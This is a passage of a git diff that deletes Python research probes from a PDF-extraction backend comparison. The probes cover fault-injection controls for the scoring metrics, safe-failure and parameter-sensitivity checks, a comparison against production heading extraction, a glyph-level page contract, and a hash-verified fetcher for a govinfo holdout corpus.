(targets A4): delete a single glyph. The smallest fault A4 must still catch.""" - out = _clone(pages) - for page in out: - if len(page.glyphs) > 100: - page.glyphs = page.glyphs[:50] + page.glyphs[51:] - return out - return out - - -B_SABOTAGES = { - "S1": (s1_drop_glyphs, "B1"), - "S2": (s2_collapse_size_band, "B2"), - "S2b": (s2b_delete_heading_lines, "B2"), - "S3": (s3_drop_margin_numbers, "B3a"), - "S4": (s4_rotate_heading_slots, "B5"), - "S5": (s5_drop_agency_headings, "B6"), -} - -# The control that decides a metric's void verdict. S2 stays in the run because its -# result is informative -- it measures how much the anchor detector actually leans on the -# small-caps size band -- but S2b is the one that injects "heading not recovered", which -# is the fault B2 names. -DECIDING = {"B1": "S1", "B2": "S2b", "B3a": "S3", "B5": "S4", "B6": "S5"} - -A_SABOTAGES = { - "SA1": (sa1_perturb_amount, "A1"), - "SA2": (sa2_drop_line, "A2"), - "SA3": (sa3_drop_one_glyph, "A4"), -} - -# Separability: (sabotage, its own metric, the metric that must move LESS). -SEPARABILITY = [ - ("S4", "B5", "B2", "threshold", 0.020), - ("S5", "B6", "B2", "strictly-less", None), -] diff --git a/docs/research/pdf-backend-bakeoff/probes/confirm_safe_failure.py b/docs/research/pdf-backend-bakeoff/probes/confirm_safe_failure.py deleted file mode 100644 index 0285af75..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/confirm_safe_failure.py +++ /dev/null @@ -1,155 +0,0 @@ -"""P3: does the pipeline DECLINE what it cannot read, or answer it confidently and wrongly? - -PRE-REGISTRATION-CONFIRMATORY.md, "P3 -- non-corpus robustness probes" and "Safe failure is -a first-class gate". - -Three outcomes per fixture, and only one of them is a failure: - - DECLINES production raises UnsupportedLayoutError -- the safe outcome - ANSWERS a diff with anchors - ANSWERS ANCHORLESS a diff with ZERO anchors -- a confident wrong answer - -Gate S-1: no fixture may land in ANSWERS ANCHORLESS. The exploratory run produced exactly -that state once, reporting 3,468 amount entries against the XML's 0 on an enrolled pair -reached by bypassing the guard, which is why this is a gate and not an observation. - -The population is deliberately mixed, and each class is labelled because they license -different claims: - - P3a real, non-corpus GPO the 12 existing fixtures + a real committee print - P3b synthetic degradations SAFE FAILURE ONLY, never accuracy -- an image-only PDF - (a GPO page rasterized, so no text layer at all) and a - non-GPO producer PDF (CoreGraphics via cupsfilter) - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/confirm_safe_failure.py -""" - -from __future__ import annotations - -import argparse -import json -import sys -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -from contract import run_backend # noqa: E402 -from reconstruct import reconstruct # noqa: E402 - -from deltatrack.compare.pdf import _is_unnumbered_layout # noqa: E402 -from deltatrack.parsers.pdf_anchors import extract_anchors # noqa: E402 - -BACKENDS = ("pdfium-wasm", "pdfminer") - - -# Every fixture is REQUIRED, and the count is pinned. This list used to be assembled with -# `if path.exists()`, which meant a tree missing `p3/imageonly.pdf` and `p3/nongpo.pdf` -# scored the remaining thirteen, found no violation and reported gate S-1 as PASSING -- on -# a population that no longer contained the two fixtures that fail it. A gate whose -# negative evidence can silently leave the population is not a gate. -_REQUIRED = ( - ("P3a real non-corpus GPO", "CRPT-118srpt198.pdf"), - ("P3a real non-corpus GPO", "BILLS-118s4795rs.pdf"), - ("P3a real committee print (markup)", "p3/CPRT-119HPRT63305.pdf"), - ("P3b synthetic: image-only", "p3/imageonly.pdf"), - ("P3b synthetic: non-GPO producer", "p3/nongpo.pdf"), -) -_N_SUBCOMMITTEE = 10 # tests/data/subcommittee/*.pdf, as scored in confirm_safe_failure.json - - -def fixtures() -> list[tuple[str, str, Path]]: - d = REPO / "tests/data" - sub = sorted((d / "subcommittee").glob("*.pdf")) - - # Order matches confirm_safe_failure.json: the two named GPO documents, the - # subcommittee prints, then the committee print and the two synthetic degradations. - named = [(k, d / rel) for k, rel in _REQUIRED] - ordered = named[:2] + [("P3a real non-corpus GPO", p) for p in sub] + named[2:] - - missing = [str(p.relative_to(d)) for _, p in named if not p.exists()] - if missing: - raise SystemExit(f"required P3 fixtures missing under tests/data: {', '.join(missing)}") - if len(sub) != _N_SUBCOMMITTEE: - raise SystemExit( - f"tests/data/subcommittee holds {len(sub)} PDFs, expected {_N_SUBCOMMITTEE}; " - "the P3a population has changed and confirm_safe_failure.json is no longer comparable" - ) - return [(k, p.name, p) for k, p in ordered] - - -def classify(pdf: Path, backend: str) -> dict: - try: - raw, summary = run_backend(backend, pdf) - except Exception as exc: # noqa: BLE001 - return {"outcome": "EXTRACTION ERROR", "error": f"{type(exc).__name__}: {exc}"} - try: - pages, _ = reconstruct(raw, repaired=True) - except Exception as exc: # noqa: BLE001 - return {"outcome": "RECONSTRUCT ERROR", "error": f"{type(exc).__name__}: {exc}"} - declined = _is_unnumbered_layout(pages) - anchors = extract_anchors(pages) - n_glyphs = sum(len(p.glyphs) for p in raw) - if declined: - outcome = "DECLINES" - elif anchors: - outcome = "ANSWERS" - else: - outcome = "ANSWERS ANCHORLESS" - return { - "outcome": outcome, - "n_pages": len(pages), - "n_glyphs": n_glyphs, - "n_anchors": len(anchors), - "empty_font_names": (summary or {}).get("empty_font_names"), - } - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument( - "--out", type=Path, default=REPO / "docs/research/pdf-backend-bakeoff/results/confirm_safe_failure.json" - ) - args = ap.parse_args() - - fx = fixtures() - print(f"{len(fx)} fixtures", file=sys.stderr) - rows = [] - for klass, name, pdf in fx: - entry = {"class": klass, "fixture": name, "backends": {}} - for b in BACKENDS: - entry["backends"][b] = classify(pdf, b) - rows.append(entry) - marks = " ".join(f"{b}={entry['backends'][b]['outcome']}" for b in BACKENDS) - print(f" {name:34} {klass[:28]:28} {marks}", file=sys.stderr) - - unsafe = [(r["fixture"], b) for r in rows for b in BACKENDS if r["backends"][b]["outcome"] == "ANSWERS ANCHORLESS"] - result = { - "gate_S1": "no fixture may land in ANSWERS ANCHORLESS", - "violations": unsafe, - "S1_passes": not unsafe, - "conference_report": ( - "NOT OBTAINED -- no package in the govinfo CRPT collection from 2015 onward carries " - "'conference report' in its title across 800 records checked; modern practice uses " - "amendments between the houses instead. Logged as a protocol deviation." - ), - "fixtures": rows, - } - args.out.parent.mkdir(parents=True, exist_ok=True) - args.out.write_text(json.dumps(result, indent=1)) - - print("\n| fixture | class | " + " | ".join(BACKENDS) + " |") - print("|---|---|" + "---|" * len(BACKENDS)) - for r in rows: - print( - f"| `{r['fixture']}` | {r['class']} | " + " | ".join(r["backends"][b]["outcome"] for b in BACKENDS) + " |" - ) - print(f"\nGate S-1: {'PASS' if not unsafe else 'FAIL -- ' + str(unsafe)}") - print(f"wrote {args.out}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/confirm_sensitivity.py b/docs/research/pdf-backend-bakeoff/probes/confirm_sensitivity.py deleted file mode 100644 index 26fdf224..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/confirm_sensitivity.py +++ /dev/null @@ -1,209 +0,0 @@ -"""Mandatory parameter-sensitivity sweep: does a lead survive the layer's own constants? - -PRE-REGISTRATION-CONFIRMATORY.md, "Mandatory parameter-sensitivity tests". Frozen rules, -none of which are tunable here: - - 5-setting parameter the leader must lead at >= 4 of 5 - 4-setting parameter >= 3 of 4 - binary parameter the ranking must not reverse between the two settings - - a metric that moves by > 0.05 across a parameter's sweep is PARAMETER-FRAGILE on that - metric, and that is reported next to its score - - a lead that exists only at the default is reported as "leads at the default - parameterization only", never as a lead - -This exists because the audit found `_SPACE_FACTOR = 0.25` inherited from PDFium-tuned -production. The confirmatory run then found the constant biting in the OPPOSITE direction -to what the audit anticipated: at a GPO small-caps word boundary the inter-word gap is -~4.3pt against a threshold of exactly 0.25 x 14.0 = 3.50, and the two backends resolve the -small-cap size differently (pdfium 11.2pt, pdfminer 10.5pt), so they land on opposite sides -of the same knife-edge. PDFium loses word spaces inside heading labels -- FAMILYHOUSING, -NAVYAND, ARMYNATIONAL -- which is most of its B2 deficit. - -Whether that is a PDFium defect or an artifact of one constant is exactly what this sweep -decides, and it is the difference between "pdfminer reads headings better" and "pdfminer -reads headings better at 0.25". - -Extraction is the expensive part and is done ONCE per document per backend; every setting -then re-runs only the reconstruction and scoring. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/confirm_sensitivity.py -""" - -from __future__ import annotations - -import argparse -import json -import statistics -import sys -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -import confirm_metrics as M # noqa: E402 -import reconstruct as R # noqa: E402 -from contract import run_backend # noqa: E402 -from score_phase1 import ( # noqa: E402 - align_to_body, - corpus_documents, - normalize_for_text_compare, - token_f1, - xml_body_tokens, -) - -from deltatrack.compare.pdf import _is_unnumbered_layout # noqa: E402 - -CANDIDATES = ("pdfium-wasm", "pdfminer") -FRAGILE = 0.05 - -SWEEPS = { - "_SPACE_FACTOR": {"values": [0.15, 0.20, 0.25, 0.30, 0.40], "default": 0.25}, - "_BASELINE_TOL": {"values": [0.1, 0.3, 0.6, 1.2, 2.0], "default": 0.6}, - "_CHROME_SIZE_RATIO": {"values": [0.0, 0.45, 0.55, 0.65], "default": 0.55}, - "repair_mode": {"values": ["strict", "repaired"], "default": "strict"}, -} -RULE = {5: 4, 4: 3, 2: None} - - -def score_one(raw_pages, xml_tokens, ref, repaired: bool) -> dict: - pages, _ = R.reconstruct(raw_pages, repaired=repaired) - toks = normalize_for_text_compare("\n".join(p.text for p in pages)) - aligned, _ = align_to_body(xml_tokens, toks) - st = M.pdf_structure(pages) - return { - "B1": token_f1(xml_tokens, aligned)["f1"], - "B2": M.b2_heading_labels(st, ref)["f1"], - "B5": (M.b5_amount_association(st, ref) or {}).get("f1"), - "B6": (M.b6_parent_child(st, ref) or {}).get("accuracy"), - } - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument( - "--out", type=Path, default=REPO / "docs/research/pdf-backend-bakeoff/results/confirm_sensitivity.json" - ) - ap.add_argument("--limit-docs", type=int, default=None) - ap.add_argument("--docs", default=None, help="comma-separated bill/version keys, for validating the sweep") - args = ap.parse_args() - - docs = corpus_documents() - if args.docs: - want = set(args.docs.split(",")) - docs = [d for d in docs if f"{d[0]}/{d[1]}" in want] - if args.limit_docs: - docs = docs[: args.limit_docs] - - cache: list[dict] = [] - for i, (bill, version, pdf, xml) in enumerate(docs, 1): - try: - raw = {b: run_backend(b, pdf)[0] for b in CANDIDATES} - pages, _ = R.reconstruct(raw["pdfium-wasm"], repaired=True) - if _is_unnumbered_layout(pages): - print(f" [{i}/{len(docs)}] {bill}/{version} declined", file=sys.stderr) - continue - cache.append( - { - "key": f"{bill}/{version}", - "raw": raw, - "xml_tokens": xml_body_tokens(xml), - "ref": M.xml_reference(xml), - "quoted_block": M.xml_has_quoted_block(xml), - } - ) - print(f" [{i}/{len(docs)}] {bill}/{version} cached", file=sys.stderr) - except Exception as exc: # noqa: BLE001 - print(f" [{i}/{len(docs)}] {bill}/{version} ERROR {exc}", file=sys.stderr) - print(f"swept over {len(cache)} production-accepted documents", file=sys.stderr) - - out: dict = {"n_documents": len(cache), "fragile_threshold": FRAGILE, "sweeps": {}} - - for param, spec in SWEEPS.items(): - rows: dict = {} - for value in spec["values"]: - saved = (R._SPACE_FACTOR, R._BASELINE_TOL, R._CHROME_SIZE_RATIO) - repaired = False - if param == "_SPACE_FACTOR": - R._SPACE_FACTOR = value - elif param == "_BASELINE_TOL": - R._BASELINE_TOL = value - elif param == "_CHROME_SIZE_RATIO": - R._CHROME_SIZE_RATIO = value - elif param == "repair_mode": - repaired = value == "repaired" - try: - per_backend: dict = {} - for b in CANDIDATES: - acc: dict[str, list[float]] = {"B1": [], "B2": [], "B5": [], "B6": []} - for entry in cache: - s = score_one(entry["raw"][b], entry["xml_tokens"], entry["ref"], repaired) - for m, v in s.items(): - if v is not None: - acc[m].append(v) - per_backend[b] = {m: round(statistics.mean(v), 5) if v else None for m, v in acc.items()} - rows[str(value)] = per_backend - finally: - R._SPACE_FACTOR, R._BASELINE_TOL, R._CHROME_SIZE_RATIO = saved - print( - f" {param}={value}: " + " ".join(f"{b}.B2={rows[str(value)][b]['B2']}" for b in CANDIDATES), - file=sys.stderr, - ) - - verdicts = {} - for metric in ("B1", "B2", "B5", "B6"): - wins = {b: 0 for b in CANDIDATES} - spread = {b: [] for b in CANDIDATES} - for value in spec["values"]: - r = rows[str(value)] - vals = {b: r[b][metric] for b in CANDIDATES if r[b][metric] is not None} - if len(vals) < 2: - continue - leader = max(vals, key=lambda b: vals[b]) - if abs(vals[CANDIDATES[0]] - vals[CANDIDATES[1]]) > 1e-9: - wins[leader] += 1 - for b, v in vals.items(): - spread[b].append(v) - n = len(spec["values"]) - need = RULE.get(n) - leader = max(wins, key=lambda b: wins[b]) - if n == 2: - held = wins[leader] == sum(wins.values()) or sum(wins.values()) == 0 - rule_text = "ranking does not reverse" if held else "RANKING REVERSES" - else: - held = wins[leader] >= (need or n) - rule_text = f"{wins[leader]}/{n} (needs {need})" - frag = {b: round(max(v) - min(v), 5) if v else None for b, v in spread.items()} - verdicts[metric] = { - "wins": wins, - "leader": leader if wins[leader] else None, - "rule": rule_text, - "lead_holds": bool(held and wins[leader]), - "sweep_spread": frag, - "parameter_fragile": {b: (f is not None and f > FRAGILE) for b, f in frag.items()}, - } - out["sweeps"][param] = {"default": spec["default"], "rows": rows, "verdicts": verdicts} - - args.out.parent.mkdir(parents=True, exist_ok=True) - args.out.write_text(json.dumps(out, indent=1)) - - for param, blk in out["sweeps"].items(): - print(f"\n=== {param} (default {blk['default']}) ===") - for metric, v in blk["verdicts"].items(): - frag = ", ".join( - f"{b} spread {v['sweep_spread'][b]}" for b in CANDIDATES if v["sweep_spread"][b] is not None - ) - fragile = [b for b, f in v["parameter_fragile"].items() if f] - tag = f" PARAMETER-FRAGILE: {', '.join(fragile)}" if fragile else "" - print( - f" {metric:4} leader={v['leader'] or '-':12} {v['rule']:22} lead_holds={v['lead_holds']} {frag}{tag}" - ) - print(f"\nwrote {args.out}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/confirm_vs_production.py b/docs/research/pdf-backend-bakeoff/probes/confirm_vs_production.py deleted file mode 100644 index b19340a5..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/confirm_vs_production.py +++ /dev/null @@ -1,139 +0,0 @@ -"""What Concern A does NOT certify: agreement with PRODUCTION, not with the harness incumbent. - -Concern A's reference is native pypdfium2 through the neutral glyph layer. That answers -"does the WASM build match the native build through the same seam?" -- and it is the right -reference for a backend swap. It does NOT answer "does the proposed glyph architecture -match what production returns today", because production does not use the glyph path at -all: `parsers/pdf_text.py` reads PDFium's TEXT API. - -Those two are not the same, and the difference is not small. On 114-hr-2029/4 production -recovers 60 heading anchors; pdfminer through the glyph layer recovers the same 60 exactly, -while both PDFium builds recover 75 of which 17 are malformed -- FAMILYHOUSING, NAVYAND, -ARMYNATIONAL -- because the layer's word-space rule loses the space at GPO small-caps -boundaries. Production's text API does not lose it. - -So a migration to the glyph architecture carrying PDFium would reproduce the harness -incumbent exactly and REGRESS against production on heading labels, and the exploratory -calibration gate could not have seen it: it compared anchor COUNTS, and the counts are not -what differ. - -This probe quantifies that across the production-accepted corpus. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/confirm_vs_production.py -""" - -from __future__ import annotations - -import argparse -import json -import statistics -import sys -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -import confirm_metrics as M # noqa: E402 -from contract import run_backend # noqa: E402 -from reconstruct import reconstruct # noqa: E402 -from score_phase1 import corpus_documents # noqa: E402 - -from deltatrack.compare.pdf import _is_unnumbered_layout # noqa: E402 -from deltatrack.parsers.pdf_anchors import extract_anchors # noqa: E402 -from deltatrack.parsers.pdf_text import extract_clean_pages # noqa: E402 - -BACKENDS = ("pdfium-native", "pdfium-wasm", "pdfminer") - - -def labels(pages) -> set[str]: - return {M.norm_label(a.text) for a in extract_anchors(pages) if a.kind in M.PDF_HEADING_KINDS and a.text} - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument( - "--out", type=Path, default=REPO / "docs/research/pdf-backend-bakeoff/results/confirm_vs_production.json" - ) - ap.add_argument("--limit-docs", type=int, default=None) - args = ap.parse_args() - - docs = corpus_documents() - if args.limit_docs: - docs = docs[: args.limit_docs] - - rows = [] - for i, (bill, version, pdf, _xml) in enumerate(docs, 1): - key = f"{bill}/{version}" - try: - prod = labels(extract_clean_pages(pdf)) - except Exception as exc: # noqa: BLE001 - print(f" [{i}/{len(docs)}] {key} production ERROR {exc}", file=sys.stderr) - continue - entry = {"doc": key, "production_anchors": len(prod), "backends": {}} - accepted = None - for b in BACKENDS: - try: - raw, _ = run_backend(b, pdf) - pages, _ = reconstruct(raw, repaired=True) - if accepted is None: - accepted = not _is_unnumbered_layout(pages) - got = labels(pages) - entry["backends"][b] = { - "anchors": len(got), - "match_production": len(got & prod), - "absent_from_production": len(got - prod), - "missed_from_production": len(prod - got), - "exact_set_match": got == prod, - "sample_absent": sorted(got - prod)[:3], - } - except Exception as exc: # noqa: BLE001 - entry["backends"][b] = {"error": f"{type(exc).__name__}: {exc}"} - entry["production_accepted"] = accepted - rows.append(entry) - marks = " ".join( - f"{b.split('-')[-1]}={entry['backends'][b].get('absent_from_production', '?')}" for b in BACKENDS - ) - print(f" [{i}/{len(docs)}] {key:<26} prod={len(prod):4} spurious: {marks}", file=sys.stderr) - - acc = [r for r in rows if r["production_accepted"] and r["production_anchors"] > 0] - summary = {} - for b in BACKENDS: - ok = [r for r in acc if "error" not in r["backends"][b]] - exact = sum(1 for r in ok if r["backends"][b]["exact_set_match"]) - spur = [r["backends"][b]["absent_from_production"] for r in ok] - miss = [r["backends"][b]["missed_from_production"] for r in ok] - summary[b] = { - "documents": len(ok), - "exact_set_match": exact, - "total_labels_absent_from_production": sum(spur), - "total_labels_missed_from_production": sum(miss), - "mean_absent_per_doc": round(statistics.mean(spur), 2) if spur else None, - } - out = { - "note": ( - "Production = parsers/pdf_text.extract_clean_pages (the TEXT API path production " - "ships). Each backend = the neutral GLYPH layer this bake-off built. Concern A's " - "reference is the harness incumbent, not this." - ), - "n_documents_scored": len(acc), - "summary": summary, - "documents": rows, - } - args.out.parent.mkdir(parents=True, exist_ok=True) - args.out.write_text(json.dumps(out, indent=1)) - - print(f"\nOver {len(acc)} production-accepted documents with headings:") - print(f" {'backend':16} {'exact set match':>16} {'labels absent from prod':>24} {'missed':>8}") - for b, s in summary.items(): - print( - f" {b:16} {s['exact_set_match']:>8}/{s['documents']:<7} " - f"{s['total_labels_absent_from_production']:>24} {s['total_labels_missed_from_production']:>8}" - ) - print(f"\nwrote {args.out}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/contract.py b/docs/research/pdf-backend-bakeoff/probes/contract.py deleted file mode 100644 index f0403cb5..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/contract.py +++ /dev/null @@ -1,174 +0,0 @@ -"""The neutral `PdfPage` contract every backend in the bake-off emits. - -This is the seam the spec's "isolate the backend, not the pipeline" section calls for. -Each backend's only job is to produce layout facts; nothing downstream of here knows -which library produced them. In particular, no backend is asked to reproduce PDFium's -text-API conventions (the U+FFFE soft hyphen, trailing spaces, the scrambled reading -order that floats running headers to the top), because `parsers/pdf_text.normalize_raw` -exists specifically to undo those, and asking a challenger to reproduce them would -reintroduce the incumbent as the reference. - -A `Glyph` is deliberately the smallest tuple the engine's geometry consumers need: - - unicode codepoint (int) - x0,y0,x1,y1 bounding box in PDF page space (points, y up) - baseline y of the text-matrix origin -- the TRUE baseline, not the box bottom - font_size effective rendered size in points (font size x text-matrix scale) - font_id PostScript/base font name, "" when the backend cannot resolve one - upright True when the glyph sits on a horizontal baseline - -`upright` earns its place because GPO pages carry a ROTATED left-gutter watermark. For -rotated text the matrix origin is not a horizontal baseline, so those glyphs must be -excluded from horizontal line clustering or they collide with body lines: measured on -this corpus, a stray rotated glyph landed on the baseline of printed lines 24 and 25 and -destroyed the margin-number match for both. PDFium happened to escape that because its -rotated glyphs share one text object; pdfminer and PyMuPDF give each its own origin. -Recovering the fact from box geometry alone is not reliable, and every candidate backend -exposes it directly (mat.b, LTChar.upright, span dir, item transform), so it is a fact -the contract should carry rather than a heuristic the layer should guess. - -Backends emit JSONL so a Node adapter and a Python adapter are interchangeable: one -object per page, then a final {"summary": {...}} line. -""" - -from __future__ import annotations - -import json -import subprocess -import sys -import threading -from collections.abc import Iterator -from dataclasses import dataclass -from pathlib import Path - -# Glyphs are carried as plain tuples on the hot path: a 1000-page bill is ~3M glyphs and -# a dataclass per glyph costs more than the whole extraction. The field order is fixed -# here and is the actual wire format. -GLYPH_FIELDS = ( - "unicode", - "x0", - "y0", - "x1", - "y1", - "baseline", - "font_size", - "font_id", - "upright", -) -CP, X0, Y0, X1, Y1, BASELINE, SIZE, FONT, UPRIGHT = range(9) - -Glyph = tuple[int, float, float, float, float, float, float, str, bool] - - -@dataclass -class PdfPage: - page_number: int # 1-based - width: float - height: float - glyphs: list[Glyph] - - -def page_from_json(obj: dict) -> PdfPage: - return PdfPage( - page_number=obj["page_number"], - width=obj["width"], - height=obj["height"], - glyphs=[tuple(g) for g in obj["glyphs"]], # type: ignore[misc] - ) - - -def page_to_json(page: PdfPage) -> str: - return json.dumps( - { - "page_number": page.page_number, - "width": page.width, - "height": page.height, - "glyphs": page.glyphs, - } - ) - - -def emit(pages: Iterator[PdfPage], summary: dict) -> None: - """Write a page stream plus a trailing summary line to stdout.""" - for page in pages: - sys.stdout.write(page_to_json(page) + "\n") - sys.stdout.write(json.dumps({"summary": summary}) + "\n") - - -def read_stream(lines: Iterator[str]) -> tuple[list[PdfPage], dict]: - pages: list[PdfPage] = [] - summary: dict = {} - for line in lines: - line = line.strip() - if not line: - continue - obj = json.loads(line) - if "summary" in obj: - summary = obj["summary"] - else: - pages.append(page_from_json(obj)) - return pages, summary - - -PROBES = Path(__file__).resolve().parent -# Guarded, not assumed: under Pyodide the probes sit in a flat VFS with no repo above -# them, and a bare parents[3] raises IndexError at import time, taking every browser -# backend down before it runs. -REPO = PROBES.parents[3] if len(PROBES.parents) > 3 else PROBES - -# Every backend is invoked the same way -- as a subprocess emitting the JSONL contract -- -# so a Node backend and a Python backend are indistinguishable to the scorer. Native -# Python backends are also importable directly (see `run_backend`), which avoids the -# subprocess and JSON round-trip when timing them. -NODE_BACKENDS = { - "pdfium-wasm": PROBES / "js" / "dump_pdfium_wasm.mjs", - "pdfjs": PROBES / "js" / "dump_pdfjs.mjs", -} -PYTHON_BACKENDS = { - "pdfium-native": "backends.pdfium_native", - "pdfminer": "backends.pdfminer_backend", - "pymupdf": "backends.pymupdf_backend", - "pypdf": "backends.pypdf_backend", -} -ALL_BACKENDS = list(PYTHON_BACKENDS) + list(NODE_BACKENDS) - - -def run_backend(backend: str, pdf: Path, limit: int | None = None) -> tuple[list[PdfPage], dict]: - """Extract `pdf` through `backend`, returning neutral pages plus its summary. - - Python backends are imported and called in-process; Node backends run as a - subprocess over the JSONL contract. Both return the same types. - """ - if backend in PYTHON_BACKENDS: - sys.path.insert(0, str(PROBES)) - mod = __import__(PYTHON_BACKENDS[backend], fromlist=["extract"]) - return mod.extract(pdf, limit) - - script = NODE_BACKENDS[backend] - cmd = ["node", "--max-old-space-size=8192", str(script), str(Path(pdf).resolve())] - if limit is not None: - cmd += ["--limit", str(limit)] - # Streamed, not captured. A 1000-page enrolled bill is ~3M glyphs; buffering the - # whole JSONL document as one string before parsing costs hundreds of megabytes on - # top of the parsed result. Reading page-by-page keeps one page's JSON alive at a - # time. stderr is drained in a thread so a chatty backend cannot deadlock on a full - # pipe buffer while we are still reading stdout. - proc = subprocess.Popen( - cmd, - stdout=subprocess.PIPE, - stderr=subprocess.PIPE, - text=True, - cwd=str(script.parent), - bufsize=1024 * 1024, - ) - assert proc.stdout is not None and proc.stderr is not None - errbuf: list[str] = [] - drain = threading.Thread(target=lambda: errbuf.append(proc.stderr.read())) - drain.start() - pages, summary = read_stream(proc.stdout) - proc.stdout.close() - drain.join() - proc.wait() - if proc.returncode != 0: - raise RuntimeError(f"{backend} failed on {pdf}: {''.join(errbuf)[-2000:]}") - return pages, summary diff --git a/docs/research/pdf-backend-bakeoff/probes/contract_hybrid.py b/docs/research/pdf-backend-bakeoff/probes/contract_hybrid.py deleted file mode 100644 index d14a011d..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/contract_hybrid.py +++ /dev/null @@ -1,50 +0,0 @@ -"""The ENRICHED contract: an ordered character stream with geometry, not a glyph bag. - -`contract.PdfPage` carries glyphs as an unordered set of positioned marks, on the -principle that ordering and spacing are generic PDF-layout decisions the consuming -project should make for itself. This contract tests the opposite principle: that -ordering and word spacing are decisions the PDF ENGINE is better positioned to make, -because it can see the encoding and text-object structure that positions alone do not -carry, and that DeltaTrack's job begins at GPO/legislative interpretation. - -The two differences from `contract.Glyph` are the whole experiment: - - 1. `chars` is ORDERED. Index order is the engine's reading order, and it is - load-bearing rather than incidental. - 2. A char may be GENERATED -- synthesised by the engine rather than read from the - content stream. A generated char has a real codepoint and a real baseline and - NOTHING ELSE: `x0`, `x1`, `size` and the vertical box are None, because measuring - them found only placeholders (zero-area box, identity matrix, size 1.0, empty font - name). They are None rather than filled so that any downstream use of a generated - char's geometry fails loudly instead of quietly consuming a placeholder. - -A backend that cannot supply the ordering or the generated flag cannot emit this -contract, which is the point: it makes the dependency explicit rather than implicit. -""" - -from __future__ import annotations - -from dataclasses import dataclass - -CHAR_FIELDS = ( - "unicode", - "generated", # engine-synthesised (word space, line break), not read from the page - "baseline", # y of FPDFText_GetCharOrigin; PRESENT for generated chars - "x0", # None when generated - "x1", # None when generated - "size", # None when generated - "vbox", # (bottom, top) or None when generated - "font", # "" when generated or unresolved - "upright", -) -CP, GEN, BASELINE, X0, X1, SIZE, VBOX, FONT, UPRIGHT = range(9) - -HybridChar = tuple[int, bool, float | None, float | None, float | None, float | None, tuple | None, str, bool] - - -@dataclass -class HybridPage: - page_number: int # 1-based - width: float - height: float - chars: list[HybridChar] diff --git a/docs/research/pdf-backend-bakeoff/probes/fetch_holdout.py b/docs/research/pdf-backend-bakeoff/probes/fetch_holdout.py deleted file mode 100644 index 4d985b84..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/fetch_holdout.py +++ /dev/null @@ -1,118 +0,0 @@ -"""Restore the P2 holdout corpus from govinfo, verifying every byte against the frozen record. - -WHY THIS EXISTS, AND WHY IT IS NOT `select_holdout.py`. The holdout files themselves are not -committed: 88 documents, 16.4 MB, and the repository's standing convention is that bill -source material is fetched rather than vendored (`/bills`, `/bills_bulk_text`, -`bills_corpus` and `/reference` are all gitignored on that reasoning). What IS committed is -`results/holdout_membership.json`, which records for every one of the 88 files its govinfo -package id, its path, its sha256 and its byte count. That file is itself covered by -`validation/PRESERVED-MANIFEST.txt`, so the record this script trusts is frozen and -hash-checked independently of this script. - -`select_holdout.py` is the SELECTION procedure and must not be used to restore the corpus. -It re-executes the stratified draw, needs the BILLSTATUS ZIPs and `$CLAUDE_JOB_DIR`, and -would REWRITE `holdout_membership.json` -- the one file the pre-registration says is frozen -and never revised. This script reads that file and never writes it. - -WHAT MAKES THE SUBSTITUTION SAFE. Every fetched byte is hashed and compared against the -frozen sha256 before it is written. A govinfo package that has been re-issued, withdrawn or -silently altered therefore FAILS LOUDLY here rather than being scored as if it were the -historical input. That is a property the committed copies did not have: nothing in the tree -verified the vendored bytes against the manifest at all. - -Verified 2026-08-07: all 88 files re-fetch byte-identical to the frozen record. - - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/fetch_holdout.py - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/fetch_holdout.py --verify-only - -Exit status is 0 only when every file in the membership is present and hash-correct. -""" - -from __future__ import annotations - -import argparse -import hashlib -import json -import sys -from pathlib import Path - -import httpx - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -MEMBERSHIP = REPO / "docs/research/pdf-backend-bakeoff/results/holdout_membership.json" -HOLDOUT_DIR = REPO / "docs/research/pdf-backend-bakeoff/holdout" -CONTENT = "https://www.govinfo.gov/content/pkg" - - -def wanted() -> list[tuple[str, str, Path, str, int]]: - """(pkg, fmt, destination, expected sha256, expected bytes) for all 88 files.""" - doc = json.loads(MEMBERSHIP.read_text()) - out = [] - for m in doc["members"]: - for v in m["versions"]: - for fmt in ("xml", "pdf"): - rec = v[fmt] - out.append((v["pkg"], fmt, HOLDOUT_DIR / rec["path"], rec["sha256"], rec["bytes"])) - return out - - -def main() -> int: - ap = argparse.ArgumentParser() - ap.add_argument( - "--verify-only", - action="store_true", - help="check what is on disk and download nothing", - ) - args = ap.parse_args() - - files = wanted() - client = ( - None - if args.verify_only - else httpx.Client(headers={"User-Agent": "DeltaTrack-bakeoff-holdout/1.0"}, timeout=300) - ) - ok = fetched = 0 - problems: list[str] = [] - - for pkg, fmt, dest, sha, nbytes in files: - rel = dest.relative_to(HOLDOUT_DIR) - if dest.exists() and hashlib.sha256(dest.read_bytes()).hexdigest() == sha: - ok += 1 - continue - if args.verify_only: - problems.append(f"{rel}: {'absent' if not dest.exists() else 'sha256 mismatch'}") - continue - url = f"{CONTENT}/{pkg}/{fmt}/{pkg}.{fmt}" - try: - r = client.get(url, 